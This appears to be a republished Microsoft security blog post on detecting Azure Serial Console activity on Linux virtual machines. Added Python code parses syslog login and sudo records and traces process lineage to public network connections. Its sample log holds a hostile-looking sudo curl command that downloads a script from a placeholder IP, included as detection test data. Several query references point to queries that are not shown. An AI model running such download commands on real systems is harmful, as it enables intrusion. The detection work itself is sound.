This is the second installment of the Azure Serial Console blog, which provides insights to improve defenders' preparedness when investigating Azure Serial Console activity on Azure Linux virtual machines.
While the first blog post discussed tracing activities such as using Azure Activity logs and Sysmon logs on Windows virtual machines to trace serial console activity, this post outlines how to enable logging on Azure Linux virtual machines using Sysmon for Linux, and how to send these events to a Log Analytics workspace.
The goal extends beyond identifying serial console activity on Linux virtual machines to using these artifacts to build additional hunting queries that detect potential abuse by attackers.
This section of the blog covers how to log Azure Linux virtual machine events using Sysmon for Linux and the Microsoft Defender for Endpoint agent, so that the artifacts of Azure serial console activity are captured.
Evidence of virtual machine access through the serial console can be found in the native Syslog and Sysmon for Linux logs on the virtual machine.
The serial console connection is made over /dev/ttyS0 on Linux virtual machines.
When the serial console is launched against a Linux virtual machine, a connection is initiated on ttyS0 and a login prompt asking for a username and password is presented.
Successful virtual machine access through the serial console can be discovered in the native Syslog logs.
Failed login attempts over the serial console are recorded there as well.
Use of 'sudo' after a successful serial console login is captured in the syslog authpriv facility; the sudo record includes the invoking user, the controlling terminal (TTY=ttyS0, which distinguishes it from SSH sessions on pts devices) and the command that was executed with 'sudo'.
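As an added illustration of the syslog artifacts described above (example code written for this page, not taken from the MSRC post or its queries), the following Python classifies the getty start, failed and successful login, and sudo messages that the agetty/login chain on ttyS0 and sudo write to syslog. The sample lines are constructed to follow the util-linux login, pam_unix and sudo message formats seen on a typical Ubuntu VM; exact wording varies by distribution and version, so treat the patterns as a starting point to tune against your own machines.

```python
"""Classify Azure serial console artifacts in Linux syslog (authpriv) messages.

Added example for this page, not code from the MSRC post. The sample lines
are constructed to follow the message formats of systemd, util-linux login,
pam_unix and sudo on a typical Ubuntu VM; wording varies by distribution.
"""
import re
from dataclasses import dataclass
from typing import Dict, Optional

SERIAL_TTY = "ttyS0"  # Azure serial console attaches to /dev/ttyS0 on Linux VMs

# Constructed sample syslog excerpt (not captured from a real VM): one failed
# and one successful serial console login, a sudo from the serial session, and
# unrelated SSH / pts activity that must not be flagged.
SAMPLE_SYSLOG = """\
Dec 18 10:01:02 vm01 systemd[1]: Started Serial Getty on ttyS0.
Dec 18 10:01:20 vm01 login[1207]: pam_unix(login:auth): authentication failure; logname=LOGIN uid=0 euid=0 tty=/dev/ttyS0 ruser= rhost=  user=azureuser
Dec 18 10:01:22 vm01 login[1207]: FAILED LOGIN (1) on '/dev/ttyS0' FOR 'azureuser', Authentication failure
Dec 18 10:01:40 vm01 login[1207]: pam_unix(login:session): session opened for user azureuser(uid=1000) by LOGIN(uid=0)
Dec 18 10:01:40 vm01 login[1207]: LOGIN ON ttyS0 BY azureuser
Dec 18 10:02:10 vm01 sudo:  azureuser : TTY=ttyS0 ; PWD=/home/azureuser ; USER=root ; COMMAND=/usr/bin/curl http://198.51.100.7/a.sh
Dec 18 10:02:30 vm01 sudo:  azureuser : TTY=pts/0 ; PWD=/home/azureuser ; USER=root ; COMMAND=/usr/bin/apt update
Dec 18 10:03:00 vm01 sshd[1300]: Accepted publickey for azureuser from 203.0.113.5 port 50022 ssh2
"""


@dataclass
class SerialEvent:
    kind: str            # see the pattern names in _PATTERNS
    tty: str             # serial device the event happened on, e.g. "ttyS0"
    user: Optional[str]  # account involved, when the message names one
    detail: str          # failure reason, or the command run via sudo
    raw: str             # the original syslog line


# Only serial ports (ttyS<n>) are matched, so SSH sessions on pts/<n> fall through.
_PATTERNS = [
    ("serial_getty_started",
     re.compile(r"Started Serial Getty on (?P<tty>ttyS\d+)")),
    ("serial_pam_auth_failure",
     re.compile(r"pam_unix\(login:auth\): authentication failure;.* tty=/dev/(?P<tty>ttyS\d+).* user=(?P<user>\S*)")),
    ("serial_login_failed",
     re.compile(r"FAILED LOGIN \(\d+\) on '/dev/(?P<tty>ttyS\d+)' FOR '(?P<user>[^']+)', (?P<detail>.*)")),
    ("serial_login_success",
     re.compile(r"LOGIN ON (?P<tty>ttyS\d+) BY (?P<user>\S+)")),
    ("serial_sudo",
     re.compile(r"sudo:\s+(?P<user>\S+) : TTY=(?P<tty>ttyS\d+) ; PWD=\S+ ; USER=\S+ ; COMMAND=(?P<detail>.*)")),
]


def classify(line: str) -> Optional[SerialEvent]:
    """Return the serial console event a syslog line represents, or None if unrelated."""
    for kind, pattern in _PATTERNS:
        m = pattern.search(line)
        if m:
            g = m.groupdict()
            return SerialEvent(kind, g["tty"], g.get("user") or None, g.get("detail", "").strip(), line)
    return None


def serial_console_report(log_text: str) -> Dict[str, list]:
    """Summarise serial console logins, failures and sudo use found in a syslog excerpt."""
    events = [e for e in map(classify, log_text.splitlines()) if e is not None]
    return {
        "events": events,
        "failed_logins": [e.user for e in events if e.kind == "serial_login_failed"],
        "successful_logins": [e.user for e in events if e.kind == "serial_login_success"],
        "sudo_commands": [(e.user, e.detail) for e in events if e.kind == "serial_sudo"],
    }


if __name__ == "__main__":
    for e in serial_console_report(SAMPLE_SYSLOG)["events"]:
        print(f"{e.kind:24} tty={e.tty} user={e.user} {e.detail}")
```

Run against a real host with `serial_console_report(open("/var/log/auth.log").read())` (or the journal exported as text); the pam_unix failure and the util-linux `FAILED LOGIN` line describe the same attempt, which is why they are kept as separate kinds rather than both being counted as failed logins.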
Every process started through the serial console on a Linux virtual machine descends from a distinctive parent process and command line (on systemd-based distributions, the agetty/login chain servicing ttyS0), which makes process lineage a reliable pivot for hunting.
The below query can identify all public network connections made by processes that were executed on a virtual machine through the serial console.
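The same lineage pivot, as an added example that is not code from the original post and also covers the later point that post-access activity can be traced through processes spawned from the serial console: start from the processes whose controlling terminal is ttyS0, collect every descendant, then flag the connections those processes made to public addresses. The process table and connection list are constructed; `snapshot_procfs()` shows how the same table is read from /proc on a live Linux host by decoding the tty_nr field of /proc/<pid>/stat, and excluding 168.63.129.16 (the Azure platform address, which `ipaddress` reports as global) is an assumption made for this example.

```python
"""Tie processes and their outbound connections back to an Azure serial console login.

Added example for this page, not code from the MSRC post. Processes started
through the serial console have ttyS0 as their controlling terminal or descend
from one that does (agetty -> login -> shell), so the lineage is the pivot.
The process table and connection list are constructed; snapshot_procfs() builds
the same table from /proc on a live Linux host (assumption: /proc is readable).
"""
import ipaddress
import os
from dataclasses import dataclass
from typing import Dict, FrozenSet, Iterable, List, Optional, Set, Tuple

SERIAL_TTY = "ttyS0"
# Azure's platform address is not in a private range, so ipaddress reports it as
# global; excluding it is an assumption for this example, not a rule from the post.
AZURE_PLATFORM_IPS: FrozenSet[str] = frozenset({"168.63.129.16"})


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    comm: str
    tty: Optional[str]  # controlling terminal, e.g. "ttyS0", "pts/0", or None


# Constructed snapshot: a serial console chain on ttyS0 beside an SSH session.
SAMPLE_PROCS: List[Proc] = [
    Proc(1, 0, "systemd", None),
    Proc(1201, 1, "agetty", "ttyS0"),
    Proc(1207, 1201, "login", "ttyS0"),
    Proc(1212, 1207, "bash", "ttyS0"),
    Proc(1290, 1212, "sudo", "ttyS0"),
    Proc(1291, 1290, "curl", "ttyS0"),
    Proc(1400, 1212, "python3", None),  # detached via setsid/nohup: no tty, but child of the serial shell
    Proc(1300, 1, "sshd", None),
    Proc(1305, 1300, "bash", "pts/0"),
    Proc(1310, 1305, "apt", "pts/0"),
]

# Constructed (pid, remote address) pairs, as an `ss -tnp` snapshot would give.
SAMPLE_CONNECTIONS: List[Tuple[int, str]] = [
    (1291, "45.76.12.34"),     # curl from the serial console shell, public
    (1400, "51.140.2.9"),      # detached process from the serial shell, public
    (1310, "10.0.0.4"),        # apt over SSH to a private mirror
    (1310, "51.140.2.10"),     # apt over SSH, public but not serial lineage
    (1212, "168.63.129.16"),   # serial shell talking to the Azure platform address
]


def serial_console_lineage(procs: Iterable[Proc], tty: str = SERIAL_TTY) -> Set[int]:
    """PIDs whose controlling terminal is `tty`, plus everything they transitively spawned."""
    procs = list(procs)
    children: Dict[int, List[int]] = {}
    for p in procs:
        children.setdefault(p.ppid, []).append(p.pid)
    lineage: Set[int] = set()
    stack = [p.pid for p in procs if p.tty == tty]
    while stack:
        pid = stack.pop()
        if pid not in lineage:
            lineage.add(pid)
            stack.extend(children.get(pid, []))
    return lineage


def public_connections_from_serial_console(procs: Iterable[Proc], connections: Iterable[Tuple[int, str]],
                                           exclude: FrozenSet[str] = AZURE_PLATFORM_IPS) -> List[Tuple[int, str, str]]:
    """(pid, comm, remote) for connections to public addresses made by the serial console lineage."""
    procs = list(procs)
    lineage = serial_console_lineage(procs)
    comm_by_pid = {p.pid: p.comm for p in procs}
    return [(pid, comm_by_pid[pid], remote) for pid, remote in connections
            if pid in lineage and remote not in exclude and ipaddress.ip_address(remote).is_global]


def tty_nr_to_name(tty_nr: int) -> Optional[str]:
    """Decode the tty_nr field of /proc/<pid>/stat (Linux dev_t encoding) into a device name."""
    if tty_nr == 0:
        return None
    major = (tty_nr >> 8) & 0xFFF
    minor = (tty_nr & 0xFF) | ((tty_nr >> 12) & 0xFFF00)
    if major == 4:               # major 4: minors 0-63 are virtual consoles, 64+ are serial ports
        return f"tty{minor}" if minor < 64 else f"ttyS{minor - 64}"
    if 136 <= major <= 143:      # Unix98 pseudo-terminal slaves
        return f"pts/{(major - 136) * 256 + minor}"
    return f"dev({major},{minor})"


def snapshot_procfs() -> List[Proc]:
    """Build the process table from /proc on a live Linux host."""
    procs: List[Proc] = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/stat") as fh:
                stat = fh.read()
        except OSError:
            continue             # process exited between listdir and open
        head, _, tail = stat.rpartition(")")  # comm is parenthesised and may contain spaces or ')'
        fields = tail.split()                 # state ppid pgrp session tty_nr ...
        procs.append(Proc(int(entry), int(fields[1]), head.split("(", 1)[1], tty_nr_to_name(int(fields[4]))))
    return procs
```

On a live host, `public_connections_from_serial_console(snapshot_procfs(), connections)` needs the connection list from `ss -tnp` or a Sysmon for Linux NetworkConnect feed; the lineage step is what catches the detached process (pid 1400 above) that has already dropped its tty and would be missed by filtering on ttyS0 alone.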
Microsoft Defender for Endpoint captures Azure serial console activity for a Linux virtual machine.
In these events, serial console connections to the Linux virtual machine appear as logons on virtual console terminals under the /dev/vc/ device path.
The below Kusto query for MDE identifies users who logged in through the serial console.
The following are a few examples of how a defender can detect suspicious activity around the Azure serial console.
An attacker can gain initial access through the Azure serial console, and any activity following that access can be identified by following the process lineage spawned from the serial console session.
In addition to the hunting techniques mentioned in Part 1, anomalous serial console connect activity can be identified using the following query.
While Azure Serial Console is a valuable feature that lets developers and administrators troubleshoot virtual machines when other access paths have failed, it can become a security liability if it is not properly monitored and secured.
This blog highlighted several opportunities for detecting malicious activity pertaining to Azure serial console.
This Cyber News was published on msrc.microsoft.com. Publication date: Wed, 20 Dec 2023 01:13:06 +0000